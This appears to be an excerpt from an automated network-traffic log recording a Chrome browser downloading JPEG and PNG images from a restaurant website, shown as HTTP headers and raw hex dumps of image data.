                                                                                                                                                    2024-10-01 04:26:31 UTC16031INData Raw: ff d8 ff e1 26 51 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 06 40 00 00 01 01 00 03 00 00 00 01 04 2c 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 37 3a 32 36 20 31 38 3a 31 37 3a 32 34 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: &QExifMM*@,(1"2i$''Adobe Photoshop CC 2015 (Windows)2022:07:26 18:17:24
                                                                                                                                                    2024-10-01 04:26:31 UTC16384INData Raw: fe 05 ef 6b 37 7e f7 ef ad b7 1d ae 0e 6e 88 cb 1c 26 35 1f 50 be 19 67 0d 8e 9d 8b e6 18 97 55 6d 21 ed 70 74 c4 6b 32 3c 5b f9 ab 50 58 3d 23 a6 a4 49 1d be e5 81 f5 9f 11 bd 0f eb 5d f8 f8 cd f4 b0 f2 83 32 a9 a9 a6 1a d1 6c fa ad 60 1f 41 ad c9 ae fd 8c fc c5 78 64 ce 39 b2 46 d6 88 8f 3e 15 63 8e a7 c2 7c 9b 22 77 1e 2e de a7 ff d3 eb 7e b4 f5 5b fa 7f 48 be dc 3b a9 a7 35 c3 6e 1f ac 37 07 3f e9 39 95 56 3e 95 de 96 e7 57 bd af a7 d4 fe 79 79 76 5f d6 1e bd 92 c3 66 6e 63 b3 2a a4 cb 5e e6 03 0f 78 f6 6c f4 9a ca db fa 4d 9e cf a7 ec ff 00 85 5d 57 d7 cc c3 66 7d 58 6c b1 c1 d8 f4 3d f1 5d 7b 9e d7 dc 3f 48 e1 bc 6d b1 bf 65 67 fc 1b 2a b6 df e7 2c b3 d9 57 9e e7 52 fc 67 fa 0e a5 cd 6d 2c 65 80 13 cc fb b7 b8 ed 0d f7 55 bd be 95 7f 43 fd 2d 9e f5
                                                                                                                                                    Data Ascii: k7~n&5PgUm!ptk2<[PX=#I]2l`Axd9F>c|"w.~[H;5n7?9V>Wyyv_fnc*^xlM]Wf}Xl=]{?Hmeg*,WRgm,eUC-
                                                                                                                                                    2024-10-01 04:26:31 UTC16384INData Raw: 48 1b 20 68 46 3d b6 73 78 5c 0c f3 39 ad e1 f6 c6 6d e3 0d e3 c5 af 5d e6 fd 4b fb 6f 15 c0 52 db c2 7f 54 63 dc 0d 92 75 9b 20 ec 67 b6 6f 0b 0c 3e 38 57 08 c2 30 c2 af 92 46 c8 7f cc 83 41 06 0f 6c 3e f9 e2 73 6d 9e 4d a3 80 e1 23 01 39 f9 09 ec 08 d8 7a e7 0e c1 ff 00 1a 0d 95 18 ab ec 14 8c 04 67 b6 0d e6 86 38 d1 d7 aa ae f3 5a c3 a3 85 ca 09 3f 71 2a 47 f8 d1 48 09 9a cf c7 a6 c0 cf 3f 6d 9c 63 b3 9a de 08 f3 5a c3 a1 85 74 5d ce 89 c1 8d 16 c1 04 1f d6 ab b2 a3 06 6c 67 96 12 30 c8 70 30 cf 21 87 d1 4f bf 96 13 ac d6 19 14 09 24 f2 f4 00 80 a3 79 f0 ab 64 90 32 7a 80 4e 2c 5b c1 5d 73 e0 4c 11 28 1e 07 3d 86 79 0c 1e d8 00 cd 6b 3f 6e 7e cc 23 d0 60 38 c3 47 e4 50 1d f6 55 49 c5 8f 0a 95 0b a6 1e e4 b6 ce 49 1a b3 2d 7f 70 9a c0 3d 89 f1 cd 86 cf
                                                                                                                                                    Data Ascii: H hF=sx\9m]KoRTcu go>8W0FAl>smM#9zg8Z?q*GH?mcZt]lg0p0!O$yd2zN,[]sL(=yk?n~#`8GPUII-p=
                                                                                                                                                    2024-10-01 04:26:31 UTC15252INData Raw: 91 ac 32 28 86 d9 ca c4 15 2c 7c ab 6a b0 a3 89 56 2b e2 b1 06 df 4d a9 82 d8 0b 5a e7 d3 44 30 b5 cd fd 07 e8 ab 0b 12 46 a2 88 1a 01 dd c6 88 3d ba 6a 2d 40 70 1d c2 89 55 00 91 c6 8c 2e 6f 89 d3 f4 62 7b 6a 0f 9c c2 ba 69 b7 dd 5b bb ff 00 4f 29 ff 00 ca ff 00 97 40 65 62 0f 03 dd 56 45 bb 1e 36 ae 63 73 7e 14 78 b0 fe 5a b1 bf 1e ea b2 f8 68 85 17 62 2c a2 b2 51 62 6f 70 75 ab 3d c0 b0 3a 77 d2 94 91 86 1a ad b4 b5 10 d9 13 7b 92 78 1d 78 d4 8b 11 2c 65 b2 a2 ea 71 1e ad 1f 91 ec 5c 1d bc 2d 7d e4 ab c2 49 07 dc 83 fc 28 3f f3 68 93 5e 9a 04 71 ac d9 01 3d bf d1 49 71 8a be 97 ee 34 35 b1 61 7c b8 ff 00 57 cb 4c e0 6a cb cd 6e 19 52 97 66 5b 70 00 68 45 29 e7 42 47 38 20 63 6f 59 68 74 5f 20 de 10 68 31 04 0e c2 6d 6b fa 28 c8 1a f8 e9 20 d6 e4 fd 1f
                                                                                                                                                    Data Ascii: 2(,|jV+MZD0F=j-@pU.ob{ji[O)@ebVE6cs~xZhb,Qbopu=:w{xx,eq\-}I(?h^q=Iq45a|WLjnRf[phE)BG8 coYht_ h1mk(
                                                                                                                                                    2024-10-01 04:26:31 UTC16384INData Raw: 7a ed 8f f9 75 f9 ad 94 f2 0f cb 46 cb d2 2c bc bd 43 cd 04 59 73 ba cb cc f8 22 51 94 21 04 df 4d 41 1a 73 7d 5e 6a 51 24 2a 43 1d 18 9c 4f d5 71 57 da 92 d1 b2 90 15 ec ec b7 d7 fa bf c4 a9 44 8e 62 32 29 c4 20 03 19 6f a7 bb 03 7d e5 30 db 6e ef ba 11 2b 0d bb e9 9c 8a 48 dc f4 a6 e5 4c 31 1d 6d ba 3f da 25 6e 76 c2 68 e2 8e dd 57 32 b6 19 e2 39 62 8f 43 9c de a2 51 9f 6e ed b9 78 63 8a 59 64 0b 60 0b 05 d0 fb 31 bf c1 a8 f7 db 4e ab 6e 11 01 1d 3b 17 0e 83 16 49 3d 78 ff 00 8b 1d 45 bb dd c6 04 8b 1f 4d 4a 93 8b 63 e3 d0 f8 3d a4 a8 37 1b 72 44 73 29 c8 30 0a 6f a7 51 2c 7d 56 a1 1c c4 47 13 d9 de 56 3c fd 41 c8 c9 1f ad 13 ae 0f 8b f9 e3 a5 87 23 21 60 4b 96 21 0a a4 43 9b 3c be f3 1f f9 b4 bb e9 0a 47 b7 89 02 ca 2d 66 36 e5 4e 98 f3 4d 9d 4b 06 d1
                                                                                                                                                    Data Ascii: zuF,CYs"Q!MAs}^jQ$*COqWDb2) o}0n+HL1m?%nvhW29bCQnxcYd`1Nn;I=xEMJc=7rDs)0oQ,}VGV<A#!`K!C<G-f6NMK
                                                                                                                                                    2024-10-01 04:26:31 UTC473INData Raw: 4a a3 da 07 fb 34 db 7f 94 46 65 93 81 dc 48 2c 8b ee a7 89 e8 ee 37 92 b4 d2 9f 33 76 7b a3 cb 5a 55 fb 3b a8 1b 6b c7 f6 52 b2 e8 a4 5f 1f 4d 35 c6 97 b9 bf 65 5c 73 00 38 7d 1d b4 0d ec 4f 01 db 7a c4 a5 d8 68 68 96 00 58 ea 6a c5 ac 78 7a 08 ab e8 6d dd dd 45 ad 7f 4d 71 d3 4d 3d 35 9a db 1c b1 37 b7 13 e1 a1 61 cc 75 fd bd f5 cc 06 47 8b f0 3a 7a 45 5d b5 b7 0d 75 ac 48 f4 69 40 2b 5c 0d 6f c3 8d 6b a8 1d dd b4 4d b1 06 c6 f5 71 a9 e3 73 44 13 8d 59 8e 43 be bd 1d b5 62 3e 83 df 57 ec ef ab 03 ca 78 1f a6 b1 3c 28 82 35 e1 57 3c 07 1a d4 56 23 f9 68 1b d4 73 a1 d0 92 0a 1e 17 06 d6 57 a4 95 1c 33 8b 80 a0 68 3c b8 d0 cc f1 6d 2f c0 76 d1 b8 38 9e 0a 34 bf d0 69 80 be 40 d8 27 7d 10 d1 f3 01 c4 8b 8a cd 70 55 8a ec f9 1b 5c 1d 39 28 ac 89 60 05 d6 45
                                                                                                                                                    Data Ascii: J4FeH,73v{ZU;kR_M5e\s8}OzhhXjxzmEMqM=57auG:zE]uHi@+\okMqsDYCb>Wx<(5W<V#hsW3h<m/v84i@'}pU\9(`E


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    41192.168.2.449788162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:31 UTC652OUTGET /assets/imgs/back_2.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.css
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:31 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:31 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:08 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 147378
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:31 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:31 UTC16031INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 07 80 00 00 01 c8 08 02 00 00 00 20 1b 60 aa 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 30 31 34 20 37 39 2e 31 35 36 37 39 37 2c 20 32 30 31 34 2f 30 38 2f 32 30 2d 30 39 3a 35 33 3a 30 32 20 20
                                                                                                                                                    Data Ascii: PNGIHDR `tEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02
                                                                                                                                                    2024-10-01 04:26:31 UTC8545INData Raw: 67 c2 99 70 26 9c 09 67 c2 99 70 26 9c 09 ff ac 87 2e c1 b7 2e 35 f5 49 70 c8 da 84 77 98 6c a1 94 7c 03 ec e4 02 f5 3f a4 98 c5 10 28 9a 0a 64 68 52 20 fe 48 90 50 00 67 b7 17 05 78 ce c1 86 b2 53 67 55 c9 dd 5a e9 41 8c 73 94 12 d6 ad ae 2a 9a 4e df 4f 71 a3 b0 55 90 0a 82 e5 44 35 5e 4f e8 24 b6 4a ed 5d 98 e7 88 3f a7 ed 32 11 eb 99 26 89 37 59 72 a1 19 df 89 fc 56 1a f3 5e 52 b0 9a ee 1f 7c 0c 58 0f 62 53 7c 6a 4a cd 84 24 c4 1b b7 f2 61 d9 f8 f1 ec 6f f2 84 2b b1 f8 70 57 06 6e 76 7a 9c e2 7e 08 77 77 76 bb ad db 9f 69 2b d8 98 43 1f 9d f3 8f 4e ef 00 58 12 da e8 b6 12 b5 7a de 9c f8 37 d5 d4 fe 2e 8f cd 4a 1f 0e 21 7a f2 2d 12 f1 c5 58 b9 0c 7b 04 21 cd f0 8f e2 fb 3e ac 1b 58 e5 01 eb 69 2c 92 36 78 5c e8 87 54 3d 35 97 d1 4a cc 39 37 c4 30 30 e1
                                                                                                                                                    Data Ascii: gp&gp&..5Ipwl|?(dhR HPgxSgUZAs*NOqUD5^O$J]?2&7YrV^R|XbS|jJ$ao+pWnvz~wwvi+CNXz7.J!z-X{!>Xi,6x\T=5J9700
                                                                                                                                                    2024-10-01 04:26:31 UTC16384INData Raw: 85 2d 16 30 52 31 1f a7 94 1e 4b 0c c3 57 db 9d 69 bf 95 e0 40 b3 df a9 39 aa 71 4a 93 0b f0 86 51 40 a8 18 2d 30 a8 e5 ea e4 77 74 c7 d9 05 26 7e d3 aa 92 7d cb 20 df f8 29 e7 ba ef e0 f2 d7 b7 2e 5e 12 1d 6d 2b d6 1c 88 e4 de a1 d9 94 60 7f e2 b5 df 88 df 1e 99 5b e2 9c 82 c7 14 96 68 5a 09 31 1f 7c 94 4a 68 0d 9f 21 14 31 2b 05 af 18 98 d6 fa 61 bb de e9 fd 25 9a 08 27 c2 89 70 22 9c 08 27 c2 89 70 22 9c 08 27 c2 89 70 22 9c 08 27 c2 89 70 22 9c 08 27 c2 89 f0 0f 21 1c 2b a0 6b 17 cb 5f 36 f2 71 4c 52 f1 46 f1 c3 18 fb 22 3a f3 f5 0b 8d b8 b0 69 c6 fa 78 89 9e e0 8d 11 eb f3 ec da 01 93 bd 96 39 7f b9 fd 0f ea b9 af cc b9 90 cf 73 f2 38 44 b9 dd a8 3f 94 ff f9 f5 c9 c1 ad ee ef 2d 7f 4d 06 2f 04 d4 3f 6b 96 e3 78 f4 29 e6 bb 7b f3 fc e4 60 6c f7 0f 36
                                                                                                                                                    Data Ascii: -0R1KWi@9qJQ@-0wt&~} ).^m+`[hZ1|Jh!1+a%'p"'p"'p"'p"'!+k_6qLRF":ix9s8D?-M/?kx){`l6
                                                                                                                                                    2024-10-01 04:26:32 UTC16384INData Raw: 97 45 53 33 87 ea fb 5e 97 89 11 e1 44 38 11 4e 84 13 e1 44 38 11 4e 84 13 e1 44 38 11 4e 84 13 e1 44 38 11 4e 84 13 e1 44 38 11 fe 21 84 cb ff e7 ff fc 6f 7e 09 bb 4e ee b6 f2 3c c5 69 8a d7 ce 92 df dd 11 60 b8 4f 62 18 83 00 af 6b 64 1f 2b f3 57 7d 15 b0 3e 83 2f ad c1 ae 88 9d e5 9d 11 8d 01 87 f2 ff 9f bd 37 c9 6e 24 d9 f5 3e ad f5 86 ce 46 52 44 e6 dd 40 9d f3 ad a7 26 35 ab 9a d4 ec db c4 db 5e 6d 25 6f 46 48 62 e7 ee d6 17 00 73 52 54 a4 a2 c9 56 f7 bd 03 5e de 48 8a f4 c6 0c f8 c1 06 0e d8 1f 9a dc 93 72 09 98 03 29 3e 96 44 72 24 4a 49 40 a2 b1 aa b3 b2 6f f0 5f a3 8a d1 ba ef ad 0f 10 50 81 ac 49 29 91 4c 89 07 cc 8d e4 9a dc 28 28 23 03 53 c9 b6 05 5f a3 3f ae 85 dd 51 48 9f f2 14 93 2b 32 6a 3d c7 34 39 08 a9 7c c9 65 a0 e0 36 fe 17 b5 6c 00
                                                                                                                                                    Data Ascii: ES3^D8ND8ND8ND8ND8!o~N<i`Obkd+W}>/7n$>FRD@&5^m%oFHbsRTV^Hr)>Dr$JI@o_PI)L((#S_?QH+2j=49|e6l
                                                                                                                                                    2024-10-01 04:26:32 UTC16384INData Raw: 79 39 ab 28 01 20 a9 33 36 15 15 24 55 2f 1a 29 3e 3e b4 fb 53 3e b8 70 74 09 7c b1 6a 94 b9 74 44 b5 15 dd 22 98 70 26 9c 09 67 c2 99 70 26 9c 09 67 c2 99 70 26 9c 09 67 c2 99 70 26 9c 09 67 c2 99 70 26 9c 09 7f 17 c2 31 57 20 95 30 52 2e cf e5 8b bc 1e 95 c5 0d f1 e5 7a e6 35 00 6e eb aa f1 34 52 e7 46 bc 48 41 65 f1 d3 c2 5d c1 6c c0 69 c4 76 97 ab a1 dd b4 3f 34 61 ab 44 df b7 d3 ec a4 8c eb 95 be db 98 5f 9e c2 e3 29 ad 49 bd 05 ae 09 00 a1 c8 77 50 35 ad b1 1f 53 63 71 14 d8 dd 72 d0 00 d9 ec 91 9b e7 31 0b 78 a3 a4 8e 84 6b 56 2c 4c cd d8 54 ac be 9a 5d 92 40 d5 d3 54 86 06 93 42 92 ca e9 c9 e8 a2 d3 e5 79 ce e6 bf 33 4f f0 7a 7c 0e 12 73 47 16 82 d0 07 58 4d 4a 6d 9a 4a 75 fb a5 94 9b 75 ed ed f4 dc db b9 97 57 9f 6f 97 a1 97 35 e8 92 1a a9 6a 40
                                                                                                                                                    Data Ascii: y9( 36$U/)>>S>pt|jtD"p&gp&gp&gp&gp&1W 0R.z5n4RFHAe]liv?4aD_)IwP5Scqr1xkV,LT]@TBy3Oz|sGXMJmJuuWo5j@
                                                                                                                                                    2024-10-01 04:26:32 UTC16336INData Raw: 67 ad 10 1a 86 57 d0 3f 81 cd 6b bd 21 97 47 ee 8f 25 9a 13 fa 32 03 52 e7 41 e0 df ba 3a 7c be 74 9d 3c 7f 07 28 c2 4f 6b 11 03 65 5a 30 82 51 99 06 9f fa a7 a5 9e c3 b3 32 fc c6 2a 5d eb 3f a7 2d 09 29 d7 36 95 8b 78 0d 7f b9 b4 5e f0 c9 27 25 58 69 60 89 7f 03 9a 7d cc 3f b3 a2 3e e5 ce f2 d6 ca a1 ca de bc 40 aa ec 47 10 9c 3d 16 96 e0 57 78 65 d4 f9 8e 87 87 d9 37 2a 86 d4 f3 2a 8c ce e7 32 56 23 f8 4a 88 c3 31 d4 fa 98 29 4a 3f 60 f0 63 ca df 42 f8 02 58 f0 93 7d 39 96 86 6e 03 d6 84 e0 33 5b f4 de 8b 75 b3 3b 86 c1 67 c8 7d 42 0a 20 49 4b 5e f7 6b c0 ad 83 8f 29 a6 a2 8f af 4d 2b 85 5a 72 25 98 2e a4 b7 0b 41 7c 91 2e 82 d3 a6 01 4e f5 9b de b4 fa 3d fb 38 8f ef 5d 89 d5 fc 22 eb bd fc 64 11 fb b9 68 e7 4a 84 13 e1 44 38 11 4e 84 13 e1 44 38 11 4e
                                                                                                                                                    Data Ascii: gW?k!G%2RA:|t<(OkeZ0Q2*]?-)6x^'%Xi`}?>@G=Wxe7**2V#J1)J?`cBX}9n3[u;g}B IK^k)M+Zr%.A|.N=8]"dhJD8ND8N
                                                                                                                                                    2024-10-01 04:26:32 UTC48INData Raw: c8 03 5a f5 8c 42 4c dd 10 4f 43 30 a6 5a 55 cf c7 6c 14 4b 1b 03 60 a5 c8 ec 38 75 c8 12 da 5f 30 d1 4d 7e 32 b1 69 95 77 71 b2 01 d0 a9 1b 29
                                                                                                                                                    Data Ascii: ZBLOC0ZUlK`8u_0M~2iwq)
                                                                                                                                                    2024-10-01 04:26:32 UTC16384INData Raw: 81 ce 11 fb 7b 5e dd e8 be 0f 98 86 da 28 21 d0 32 62 d9 8c e2 22 1f ce ce 1a e1 e9 22 79 35 ff f1 76 fb d1 e5 8b 28 79 33 a0 f0 8f 10 3c b8 a4 6b 59 24 c9 e1 36 b0 52 37 a1 c4 8b bc 28 b0 07 8b a0 f6 cd 8d 10 39 81 16 73 04 68 ce d7 35 47 09 9e 9c 64 81 fd d4 66 ba 60 21 10 06 c3 10 ec 80 f0 ad 6a b1 06 ef 73 56 52 6d 42 21 89 fd 10 5a fd e3 83 1d 31 c4 f9 5c 05 11 4e 84 13 e1 44 38 11 4e 84 13 e1 44 38 11 4e 84 13 e1 44 38 11 4e 84 13 e1 44 38 11 4e 84 13 e1 9f 44 38 5a 3d 7b 09 f5 b9 59 7e 34 0e 5f 3b 76 61 98 e2 39 c1 d1 54 1c fc 3a 2b 95 64 d1 f1 ba 16 b5 11 fd 18 8e 83 b5 23 6b 5a b3 a9 df 17 0f e1 65 ba 59 13 04 fc 0d 70 84 e2 33 25 e3 a6 15 00 96 d6 fc eb 56 3b b0 54 8e 10 30 09 26 2e e4 59 68 26 dd 1d 3d 97 fa 66 87 c8 ec 1f e2 b7 83 fb ba c3 da
                                                                                                                                                    Data Ascii: {^(!2b""y5v(y3<kY$6R7(9sh5Gdf`!jsVRmB!Z1\ND8ND8ND8ND8ND8Z={Y~4_;va9T:+d#kZeYp3%V;T0&.Yh&=f
                                                                                                                                                    2024-10-01 04:26:32 UTC16384INData Raw: 63 25 f2 d5 e7 d3 8c cc 8d a3 dd d9 7f bb 11 7e 79 8d 23 4f 63 2f 3f 5a 56 78 eb e2 c9 c0 b9 6b 80 f5 85 95 5a 69 bf ef fe 5d 8a f8 ad a9 28 af ad 43 07 c3 77 46 d4 05 ea d2 38 95 f3 2a 6a cf d6 50 8e 2e 0b 21 c0 d0 7b c3 61 a1 fc ed 88 db 4b 7e be 57 f8 33 67 29 b2 df 4e b1 85 e2 2f cf 01 d6 bf 0f 3b 59 f7 39 7c b4 68 fa 58 9e 97 2d 9b 74 77 00 04 18 11 4e 84 13 e1 44 38 11 4e 84 13 e1 44 38 11 4e 84 13 e1 44 38 11 4e 84 13 e1 44 38 11 4e 84 13 e1 ef 42 f8 46 02 5c ae 14 bb 2c 2e c4 74 3f 48 40 07 cc fa d3 c8 7d 28 53 28 ce 67 e7 ab 99 04 37 15 2c 29 f9 ea 32 d0 a9 94 7c 38 a8 bf aa 36 bc d4 bd 00 eb 8a 19 9e be 37 bb 9e fd e9 2b 37 eb b8 35 5e be 48 77 8f f6 61 a7 e3 45 28 bc a9 b6 fb c4 4e 2e 0d 9d 82 48 6e 3f 41 d4 c0 5c cf a7 d0 06 74 7a 71 9f 5c d9
                                                                                                                                                    Data Ascii: c%~y#Oc/?ZVxkZi](CwF8*jP.!{aK~W3g)N/;Y9|hX-twND8ND8ND8ND8NBF\,.t?H@}(S(g7,)2|867+75^HwaE(N.Hn?A\tzq\
                                                                                                                                                    2024-10-01 04:26:32 UTC16384INData Raw: 38 39 0f 76 c5 67 f0 31 4a ca 7c c0 c5 e0 df 35 d0 66 65 53 81 9b 81 98 04 ef 2b 2d 57 ad ad 6b 1a 0b f8 11 c0 25 4c 9b 0a 4e 12 c3 38 81 cb 77 5b 8b d4 d2 20 e1 7e 21 cc 22 34 69 4e 56 08 e7 33 84 0d 8c 20 e2 43 7e e1 92 ec 6a 5d 59 75 1e 26 1f 34 f0 e9 1c 9e 7b bb 31 35 a6 50 32 55 a7 e3 a4 13 0c 17 33 1c b2 c2 9e 9b b9 1f a7 a5 c2 5f ee d6 b6 a9 04 0a 80 2f ee bc ec 4f 40 71 73 c0 2e 92 24 0c 56 e3 63 e2 25 61 61 bf c4 26 94 b8 8f 00 dd 07 e7 62 f7 52 3c 0f 7f 63 28 2b 86 7b 16 68 3f 00 9c 68 8d 1e a7 78 76 72 74 10 ab 13 8c ad ad f0 b2 c5 e0 f0 4b 18 3f bc a9 35 82 ab 29 07 32 85 64 2d ea b8 64 ca e7 14 c6 81 ca 1f c7 05 8c 1f a2 9a dc 24 01 7e 4b 0a e6 98 85 33 c1 85 29 a8 76 e9 aa 0a 76 7e 3c a6 01 06 00 5e 5b d7 f5 4a 63 3a 0e 65 6b c4 5b a9 31 4c
                                                                                                                                                    Data Ascii: 89vg1J|5feS+-Wk%LN8w[ ~!"4iNV3 C~j]Yu&4{15P2U3_/O@qs.$Vc%aa&bR<c(+{h?hxvrtK?5)2d-d$~K3)vv~<^[Jc:ek[1L


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    42192.168.2.449791162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:31 UTC665OUTGET /assets/imgs/Banner_index_image.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/assets/css/foodhut.css
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:32 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:31 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 23:45:08 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 603860
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:31 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:32 UTC16031INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 14 00 00 02 07 08 06 00 00 00 ee 03 d0 53 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                    Data Ascii: PNGIHDRSpHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R
                                                                                                                                                    2024-10-01 04:26:32 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
